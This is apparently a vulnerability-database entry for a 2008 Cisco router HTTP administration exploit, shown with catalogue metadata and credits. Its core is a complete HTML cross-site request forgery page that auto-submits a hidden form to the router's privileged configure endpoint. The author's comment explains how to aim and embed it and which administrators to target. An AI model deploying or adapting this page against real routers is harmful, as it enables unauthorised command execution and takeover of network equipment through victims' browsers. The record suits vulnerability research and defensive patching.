Sign-up

ID

VAR-E-200809-0194


EDB ID

6477


TITLE

Cisco Router - HTTP Administration Cross-Site Request Forgery / Command Execution (2) - Hardware remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 6477

DESCRIPTION

Cisco Router - HTTP Administration Cross-Site Request Forgery / Command Execution (2).. remote exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 6477

AFFECTED PRODUCTS

vendor:ciscomodel:routerscope: - version: -

Trust: 1.6

sources: EXPLOIT-DB: 6477 // EDBNET: 30708

EXPLOIT

<!-- Jeremy Brown [0xjbrown41@gmail.com/http://jbrownsec.blogspot.com]
Cisco Router HTTP Administration CSRF Remote Command Execution Universal Exploit #2
Replace "10.10.10.1" with the IP address of the target router, embed this in a web
page and hope for the best. Cisco Admin's + Safari are the best targets ;) -->

<html>
<body>

<body onload="fdsa.submit();">

<form name=fdsa method="post" action="http://10.10.10.1/level/15/exec/-/configure/http">

<input type=hidden name=command value="alias exec xx xx">

<input type=hidden name=command_url value="/level/15/exec/-">
<input type=hidden name=new_command_url value="/level/15/configure/-">

</body>
</html>

# milw0rm.com [2008-09-17]

Trust: 1.0

sources: EXPLOIT-DB: 6477

EXPLOIT LANGUAGE

html

Trust: 0.6

sources: EXPLOIT-DB: 6477

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 6477

TYPE

HTTP Administration Cross-Site Request Forgery / Command Execution (2)

Trust: 1.0

sources: EXPLOIT-DB: 6477

CREDITS

Jeremy Brown

Trust: 0.6

sources: EXPLOIT-DB: 6477

EXTERNAL IDS

db:EXPLOIT-DBid:6477

Trust: 1.6

db:EDBNETid:30708

Trust: 0.6

sources: EXPLOIT-DB: 6477 // EDBNET: 30708

REFERENCES

url:https://www.exploit-db.com/exploits/6477/

Trust: 0.6

sources: EDBNET: 30708

SOURCES

db:EXPLOIT-DBid:6477
db:EDBNETid:30708

LAST UPDATE DATE

2022-07-27T09:28:31.239000+00:00


SOURCES RELEASE DATE

db:EXPLOIT-DBid:6477date:2008-09-17T00:00:00
db:EDBNETid:30708date:2008-09-17T00:00:00